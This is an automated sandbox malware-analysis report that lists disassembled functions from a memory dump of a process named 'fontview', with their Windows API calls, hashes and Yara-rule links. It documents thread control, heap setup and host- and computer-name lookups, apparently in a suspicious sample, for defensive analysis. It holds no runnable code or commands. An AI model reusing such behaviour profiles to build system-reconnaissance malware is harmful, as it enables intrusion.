Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 289322838-0
Opcode ID: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
Instruction ID: 592dd81a24b4693bc26b9f645d6de9898b1e2dcdf9a12e457dba177d0956e45d
Opcode Fuzzy Hash: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
Instruction Fuzzy Hash: B901A4355001297BEB11DB64CC49EEE73EDEF49360F0441A5F905C7194EBB4EE858A60

Function 100075EF Relevance: 4.5, APIs: 3, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1000E186: __EH_prolog.LIBCMT ref: 1000E18B
Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1B1
Part of subcall function 1000E186: _rand.LIBCMT ref: 1000E1BE
Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1C7
Part of subcall function 1000E186: _sprintf.LIBCMT ref: 1000E228

TerminateThread.KERNEL32(?,00000000,75920F10,00000001,?,100060CA,00000000,?), ref: 10007627
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000030,?,00000000,00000030), ref: 10007630
CreateThread.KERNELBASE(00000000,00000000,Function_0001D6D7,?,00000000,00000000), ref: 10007643

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread__time64$CloseCreateH_prologHandleTerminate_rand_sprintf
String ID:
API String ID: 1419693727-0
Opcode ID: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
Instruction ID: 4a25103f81a40976197cae3d50368f644efecd2bc1ee7d5a155f56b6d39a0099
Opcode Fuzzy Hash: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
Instruction Fuzzy Hash: 49F049B1801B94AFF7209F658D88993BBE8FB042D5B04482EE5CB02A11C63AAC04CB60

Function 1001E0D0 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
CloseHandle.KERNEL32(?), ref: 1001E0FE
CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread$CloseCreateHandleTerminate
String ID:
API String ID: 214294483-0
Opcode ID: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
Instruction ID: 2dd09b30243e208cee3be36777b7a391327da2b40f2e85d95d0c5eab96f726e9
Opcode Fuzzy Hash: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
Instruction Fuzzy Hash: 8EF05E75404BD4BEE3629B6A8DC8A57FBDCFB45398F05142DF18286921C6B0FCC68721

Function 1001DF0D Relevance: 4.5, APIs: 3, Instructions: 33networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 1001DF22
gethostbyname.WS2_32(?), ref: 1001DF38
inet_ntoa.WS2_32(?), ref: 1001DF4A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 289322838-0
Opcode ID: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
Instruction ID: 809eef93411cdc36f9b95217684b62963118020cb64196cb20eb42ce4d12313c
Opcode Fuzzy Hash: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
Instruction Fuzzy Hash: 2BF05E355001157BD701EB64DC45EEE73ACEF09360F0091A5F911CB1E0DB74EA858BA1

Function 10005697 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 100056B1
ReleaseMutex.KERNEL32(?), ref: 100056C9
Sleep.KERNELBASE(00000001), ref: 100056DA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
Instruction ID: dded88739cd7db52ccc2d7391d290ba0f31111a6fc9c71b8e083dbddec35d66f
Opcode Fuzzy Hash: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
Instruction Fuzzy Hash: 06F082302157109BFB109B358C0D79773D8EB046E2F504A59F86AD31E4DBB6B940CAA8

Function 1000D556 Relevance: 4.5, APIs: 3, Instructions: 29synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000D570
ReleaseMutex.KERNEL32(?), ref: 1000D588
Sleep.KERNELBASE(00000001), ref: 1000D590

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
Instruction ID: 40aa0b88ac9075472564fd970badd49691fce1c548194cc152243a28c8bc4203
Opcode Fuzzy Hash: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
Instruction Fuzzy Hash: A4F0A030614E189BEB50AFB48C0969A33E8EB043A6F004705FC66D72D0DF70E800C6A0

Function 1001E124 Relevance: 4.5, APIs: 3, Instructions: 26threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
CloseHandle.KERNEL32(?), ref: 1001E146
CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread$CloseCreateHandleTerminate
String ID:
API String ID: 214294483-0
Opcode ID: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
Instruction ID: 6c47360e48e541f40c0052723e9235e3811fbb2456bc37a5d5909ff28a07795f
Opcode Fuzzy Hash: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
Instruction Fuzzy Hash: 93E06DB1401BA4BEE3609B699DC895BBFDCFB05399F04542DF18241910C6B8BC40CF20

Function 100058BF Relevance: 3.1, APIs: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100058C4

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10005A51

Part of subcall function 1001EAC0: GetNativeSystemInfo.KERNEL32(?,B7A91B76,0000000F), ref: 1001EB35
Part of subcall function 1001EAC0: HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
Part of subcall function 1001EAC0: _free.LIBCMT ref: 1001EC31

Part of subcall function 1001E420: HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
Part of subcall function 1001E420: _free.LIBCMT ref: 1001E4DD

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CreateHeap_free$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInfoInternal_throw_exceptionNativeSystem_malloc
String ID:
API String ID: 3164855647-0
Opcode ID: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
Instruction ID: c803a41f29da07c650d3c58594bacb453c4fb1dd27e1a6e1f1a30392c0a1c04b
Opcode Fuzzy Hash: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
Instruction Fuzzy Hash: A151F3B2802261DED305CF2BCCD1159BFA4FB59314BEA826ED01997A69C7FD5440CF11

Function 1001E420 Relevance: 3.1, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F

Part of subcall function 1001F4D0: HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
Part of subcall function 1001F4D0: _free.LIBCMT ref: 1001F535

Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000), ref: 1001F67A
Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,00000000), ref: 1001F68E

_free.LIBCMT ref: 1001E4DD

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Create$Heap$Semaphore_free$ErrorFreeLast
String ID:
API String ID: 728542959-0
Opcode ID: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
Instruction ID: 800e16aa3107edb63feffa1116bd34484aa86493a69fc312601903e07da96963
Opcode Fuzzy Hash: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
Instruction Fuzzy Hash: B33110B4405B44DFE360CF64C959B9BBBE4FB04708F008A1DE4AA9B7C1D7B9A548CB91

Function 10025E20 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,B7A91B76,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E61
GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E7C

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
Instruction ID: 59a8315101be3ab263f7812ecb0399de6b67e1f0b14bca8f03ae134136496eb9
Opcode Fuzzy Hash: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
Instruction Fuzzy Hash: 60115E72944258DFDB04CF98ED85BA9B7F8F709714F40466AE80AD3B50D77AA510CF44

Function 1001C213 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001C218
GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ComputerH_prologName
String ID:
API String ID: 2340896887-0
Opcode ID: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
Instruction ID: 1d68eca033c9043e72de2a4286cf069eb490a1f05f2ee87c86d81987e30c12f2
Opcode Fuzzy Hash: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
Instruction Fuzzy Hash: 69011AB2D0012DAEDB15DF94D882AEEB7BCEB04344F0040AAA609E3241D7745F888BE0

Function 1001F4D0 Relevance: 3.0, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
_free.LIBCMT ref: 1001F535

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Heap$CreateErrorFreeLast_free
String ID:
API String ID: 910146552-0
Opcode ID: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
Instruction ID: f604b513f122066b879ad4c2375b27ded08a991e1fe4a324105a739978d0ea99
Opcode Fuzzy Hash: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
Instruction Fuzzy Hash: D5019DB1200B06ABE3048F25D828B42FBA4BB45309F008219D6448BA80D3FAB568CFD1

Function 1001F7B0 Relevance: 3.0, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 1001F7D5
_free.LIBCMT ref: 1001F815

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Heap$CreateErrorFreeLast_free
String ID:
API String ID: 910146552-0
Opcode ID: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
Instruction ID: 012904b8805aae3dbedbbf78297134198325bffc3ea54a5c621821fb0c9ecd51
Opcode Fuzzy Hash: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
Instruction Fuzzy Hash: 0701AFB5200B06ABE304CF25D828B42FBB4FB55309F008219D5448BB80D7FAE468CFD1

Function 100483E9 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

___copy_path_to_wide_string.LIBCMT ref: 100483F8
_free.LIBCMT ref: 10048428

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ___copy_path_to_wide_string_free
String ID:
API String ID: 339592613-0
Opcode ID: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
Instruction ID: 424f71bbd37a06cd7e57c26e38fcdaf5a0552f039bab1a5dfaedcc90aead64a7
Opcode Fuzzy Hash: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
Instruction Fuzzy Hash: D2F01C3651010DFFDF028F95DD02DDEBBAAEF093A9F204554FA10A51A0E776DA20EB94

Function 10017A55 Relevance: 3.0, APIs: 2, Instructions: 17networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

closesocket.WS2_32(00000000), ref: 10017A62
WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 10017A6D

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket
String ID:
API String ID: 1278161333-0
Opcode ID: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
Instruction ID: c10fd3888be95ff44920b7b525900d4ac3c0e5df11b5dd3981ea2acee834d5df
Opcode Fuzzy Hash: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
Instruction Fuzzy Hash: C0E0EC31400A229BC7109F68E84428A77B1AF45334F61C649E07A865F0C332EDC29A40

Function 10009E53 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10009E84

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
Instruction ID: 90c222bfae742fec60398cccdc4e1f23cd5be1458402abc6deef91bfde91d8dd
Opcode Fuzzy Hash: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
